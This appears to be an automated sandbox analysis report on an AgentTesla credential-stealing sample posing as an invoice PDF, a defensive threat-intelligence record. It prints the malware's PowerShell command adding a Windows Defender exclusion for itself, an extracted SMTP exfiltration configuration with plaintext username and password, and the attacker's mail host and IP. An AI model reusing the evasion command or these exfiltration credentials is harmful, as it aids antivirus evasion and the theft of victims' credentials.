Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report INVOICE & TELEX BL_PDF.exe

Overview

General Information

Sample Name:INVOICE & TELEX BL_PDF.exe
Analysis ID:491534
MD5:22a2657bb48e3303f6f0a0fd1fdfe441
SHA1:d6a230a732f3d691a7fce60081f30627ffabd33d
SHA256:85627117b351e81655bb56b947b61a198d195a225db0e002ef476460b9f273ac
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • INVOICE & TELEX BL_PDF.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
    • powershell.exe (PID: 6256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INVOICE & TELEX BL_PDF.exe (PID: 5028 cmdline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
    • INVOICE & TELEX BL_PDF.exe (PID: 5728 cmdline: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe MD5: 22A2657BB48E3303F6F0A0FD1FDFE441)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "slot2@zfftcn.com", "Password": "*VNHf^L9", "Host": "smtp.zfftcn.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.INVOICE & TELEX BL_PDF.exe.26185cc.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      Click to see the 4 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' , ParentImage: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe, ParentProcessId: 6708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', ProcessId: 6256
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe' , ParentImage: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe, ParentProcessId: 6708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe', ProcessId: 6256
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132772619685794460.6256.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "slot2@zfftcn.com", "Password": "*VNHf^L9", "Host": "smtp.zfftcn.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: INVOICE & TELEX BL_PDF.exeVirustotal: Detection: 37%Perma Link
                      Source: INVOICE & TELEX BL_PDF.exeReversingLabs: Detection: 33%
                      Source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49826 -> 208.91.199.225:587
                      Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                      Source: global trafficTCP traffic: 192.168.2.3:49826 -> 208.91.199.225:587
                      Source: global trafficTCP traffic: 192.168.2.3:49826 -> 208.91.199.225:587
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: http://Dmxfln.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000003.522926739.00000000012A4000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557862224.00000000033EC000.00000004.00000001.sdmpString found in binary or memory: http://Dsl8ffzBvoWnMQBLSV.net
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290170876.0000000005656000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.289878864.0000000005673000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipediaHWV
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmpString found in binary or memory: http://smtp.zfftcn.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.292202005.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.297199473.000000000565E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comR.TTF
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comT
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.297973029.000000000565C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296860370.000000000565C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsF
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasTF
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comce
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcoma
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comituF
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comx
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291403933.0000000005658000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn1
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnL
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnv-s_
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/%
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.292953266.000000000565B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oby
                      Source: INVOICE & TELEX BL_PDF.exeString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comtf
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293857674.0000000005684000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.zfftcn.com

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: INVOICE & TELEX BL_PDF.exe
                      Source: initial sampleStatic PE information: Filename: INVOICE & TELEX BL_PDF.exe
                      .NET source code contains very large stringsShow sources
                      Source: INVOICE & TELEX BL_PDF.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 1.2.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 1.0.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 6.0.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 6.2.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: 7.0.INVOICE & TELEX BL_PDF.exe.cb0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246C1941_2_0246C194
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246E5E01_2_0246E5E0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 1_2_0246E5F01_2_0246E5F0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_012756607_2_01275660
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0127B9087_2_0127B908
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01276C4C7_2_01276C4C
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014741087_2_01474108
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014788D07_2_014788D0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_014778F87_2_014778F8
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01470D607_2_01470D60
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0147ADD07_2_0147ADD0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0147E86A7_2_0147E86A
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01472A367_2_01472A36
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01472FD07_2_01472FD0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01475E087_2_01475E08
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150B9007_2_0150B900
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150D9DA7_2_0150D9DA
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_015060307_2_01506030
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_0150025A7_2_0150025A
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_015072007_2_01507200
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000000.287593997.0000000000370000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIzDMlWzDsqkQJGmrjtpXNzhyRQszW.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000006.00000000.310876714.00000000004F0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554736809.0000000001138000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000000.311902776.0000000000D80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameIzDMlWzDsqkQJGmrjtpXNzhyRQszW.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exeBinary or memory string: OriginalFilenameWindowsIdenti.exe4 vs INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: INVOICE & TELEX BL_PDF.exeVirustotal: Detection: 37%
                      Source: INVOICE & TELEX BL_PDF.exeReversingLabs: Detection: 33%
                      Source: INVOICE & TELEX BL_PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE & TELEX BL_PDF.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jek5pvp.a5z.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@8/6@2/1
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
